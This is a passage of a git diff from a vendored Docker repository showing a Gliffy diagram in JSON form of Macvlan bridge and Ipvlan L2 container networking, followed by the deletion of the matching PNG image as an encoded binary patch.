"interpolationType":"quadratic","cornerRadius":0,"text":{"color":"#002248"}},"text":{"color":"#002248"},"stage":{"color":"#FFFFFF"}},"viewportType":"default","fitBB":{"min":{"x":2,"y":6.5},"max":{"x":541,"y":334.5}},"printModel":{"pageSize":"a4","portrait":false,"fitToOnePage":false,"displayPageBreaks":false},"objects":[{"x":2.0,"y":6.5,"rotation":0.0,"id":288,"width":541.0,"height":22.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":31,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Macvlan Bridge Mode & Ipvlan L2 Mode

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":8.0,"y":177.0,"rotation":0.0,"id":234,"width":252.0,"height":129.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":0,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#434343","fillColor":"#c5e4fc","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.93,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":16.0,"y":240.0,"rotation":0.0,"id":225,"width":111.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":1,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.73,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.2199999999999993,"y":0.0,"rotation":0.0,"id":235,"width":106.56,"height":45.0,"uid":null,"order":"auto","lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container #1

eth0

172.16.1.10/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":138.0,"y":240.0,"rotation":0.0,"id":237,"width":111.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":4,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.73,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.2199999999999993,"y":0.0,"rotation":0.0,"id":238,"width":106.56,"height":44.0,"uid":null,"order":6,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container #2

eth0 172.16.1.11/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":40.0,"y":-26.067047119140625,"rotation":0.0,"id":258,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":7,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":237,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":241,"py":1.0,"px":0.7071067811865476}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[153.5,266.0670471191406],[117.36753236814712,224.06704711914062]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":50.0,"y":-16.067047119140625,"rotation":0.0,"id":259,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":8,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":225,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":241,"py":0.9999999999999996,"px":0.29289321881345254}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[21.5,256.0670471191406],[62.632467631852876,214.0670471191406]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":60.0,"y":-6.067047119140625,"rotation":0.0,"id":260,"width":100.0,"height":100.
0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":9,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":241,"py":0.5,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":246,"py":0.5,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[75.0,180.06704711914062],[215.32345076546227,90.06897143333742]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":3.0,"y":184.5,"rotation":0.0,"id":261,"width":79.0,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":10,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Docker

Host #1

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":283.0,"y":177.0,"rotation":0.0,"id":276,"width":252.0,"height":129.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":11,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#434343","fillColor":"#c5e4fc","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.93,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":291.0,"y":240.0,"rotation":0.0,"id":274,"width":111.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":12,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.73,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.2199999999999993,"y":0.0,"rotation":0.0,"id":275,"width":106.56,"height":45.0,"uid":null,"order":14,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container #3

eth0

172.16.1.12/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":413.0,"y":240.0,"rotation":0.0,"id":272,"width":111.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":15,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.73,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.2199999999999993,"y":0.0,"rotation":0.0,"id":273,"width":106.56,"height":44.0,"uid":null,"order":17,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Container #4

eth0 172.16.1.13/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":315.0,"y":-26.067047119140625,"rotation":0.0,"id":269,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":18,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":272,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":270,"py":1.0,"px":0.7071067811865476}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[153.5,266.0670471191406],[117.36753236814712,224.06704711914062]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":325.0,"y":-16.067047119140625,"rotation":0.0,"id":268,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":19,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":274,"py":0.0,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":270,"py":0.9999999999999996,"px":0.29289321881345254}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[21.5,256.0670471191406],[62.632467631852876,214.0670471191406]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":278.0,"y":184.5,"rotation":0.0,"id":267,"width":79.0,"height":32.0,"uid":"c
om.gliffy.shape.basic.basic_v1.default.text","order":20,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Docker

Host #2

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":70.0,"y":3.932952880859375,"rotation":0.0,"id":278,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":21,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":270,"py":0.5,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":246,"py":0.5,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[340.0,170.06704711914062],[205.32345076546227,80.06897143333742]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":167.32131882292583,"y":39.0019243141968,"rotation":0.0,"id":246,"width":216.0042638850729,"height":90.0,"uid":"com.gliffy.shape.cisco.cisco_v1.storage.cloud","order":22,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.storage.cloud","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#434343","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":356.0,"y":150.0,"rotation":0.0,"id":270,"width":108.0,"height":48.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":23,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#cccccc","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":1.0,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[
{"x":1.8620689655172418,"y":0.0,"rotation":0.0,"id":271,"width":104.27586206896557,"height":42.0,"uid":null,"order":25,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

(Host) eth0

172.16.1.253/24

(IP Optional)

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":81.0,"y":150.0,"rotation":0.0,"id":241,"width":108.0,"height":48.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":26,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#cccccc","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":1.0,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":1.8620689655172415,"y":0.0,"rotation":0.0,"id":242,"width":104.27586206896555,"height":42.0,"uid":null,"order":28,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

(Host) eth0

172.16.1.254/24

(IP Optional)

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":224.0,"y":64.19999694824219,"rotation":0.0,"id":262,"width":120.00000000000001,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":29,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Network Gateway

172.16.1.1/24

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":307.5,"rotation":0.0,"id":282,"width":541.0,"height":36.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":30,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Containers Attached Directly to Parent Interface. No Bridge Used (Docker0)

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"layers":[{"guid":"9wom3rMkTrb3","order":0,"name":"Layer 0","active":true,"locked":false,"visible":true,"nodeIndex":32}],"shapeStyles":{},"lineStyles":{"global":{"fill":"none","stroke":"#000000","strokeWidth":1,"orthoMode":2}},"textStyles":{"global":{"italic":true,"face":"Arial","size":"20px","color":"#000000","bold":false}}},"metadata":{"title":"untitled","revision":0,"exportBorder":false,"loadPosition":"default","libraries":["com.gliffy.libraries.basic.basic_v1.default","com.gliffy.libraries.flowchart.flowchart_v1.default","com.gliffy.libraries.swimlanes.swimlanes_v1.default","com.gliffy.libraries.images","com.gliffy.libraries.network.network_v4.home","com.gliffy.libraries.network.network_v4.business","com.gliffy.libraries.network.network_v4.rack","com.gliffy.libraries.network.network_v3.home","com.gliffy.libraries.network.network_v3.business","com.gliffy.libraries.network.network_v3.rack"],"lastSerialized":1458124258706,"analyticsProduct":"Confluence"},"embeddedResources":{"index":0,"resources":[]}} \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.png b/vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.png deleted file mode 100644 index 13aa4f212d9db346f307dfbe111fd657406bb943..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 14527 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 